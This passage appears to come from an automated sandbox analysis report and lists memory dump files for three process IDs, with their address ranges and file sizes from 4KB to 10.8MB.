                                                                                                                                                                                                                          • memory/3988-124-0x00007FFF07B60000-0x00007FFF07B61000-memory.dmp
                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                          • memory/3988-123-0x000000001BE00000-0x000000001BE18000-memory.dmp
                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            96KB

                                                                                                                                                                                                                          • memory/3988-119-0x00007FFF07B70000-0x00007FFF07B71000-memory.dmp
                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                          • memory/3988-113-0x0000000003180000-0x000000000318E000-memory.dmp
                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            56KB

                                                                                                                                                                                                                          • memory/5128-252-0x00007FFEEBAE0000-0x00007FFEEC5A1000-memory.dmp
                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            10.8MB

                                                                                                                                                                                                                          • memory/5128-239-0x00007FFEEBAE0000-0x00007FFEEC5A1000-memory.dmp
                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            10.8MB

                                                                                                                                                                                                                          • memory/5128-176-0x000002D74E3D0000-0x000002D74E3E0000-memory.dmp
                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            64KB

                                                                                                                                                                                                                          • memory/5144-200-0x000001C2B2F60000-0x000001C2B2F70000-memory.dmp
                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            64KB

                                                                                                                                                                                                                          • memory/5144-202-0x000001C2B2F60000-0x000001C2B2F70000-memory.dmp
                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            64KB

                                                                                                                                                                                                                          • memory/5144-179-0x00007FFEEBAE0000-0x00007FFEEC5A1000-memory.dmp
                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            10.8MB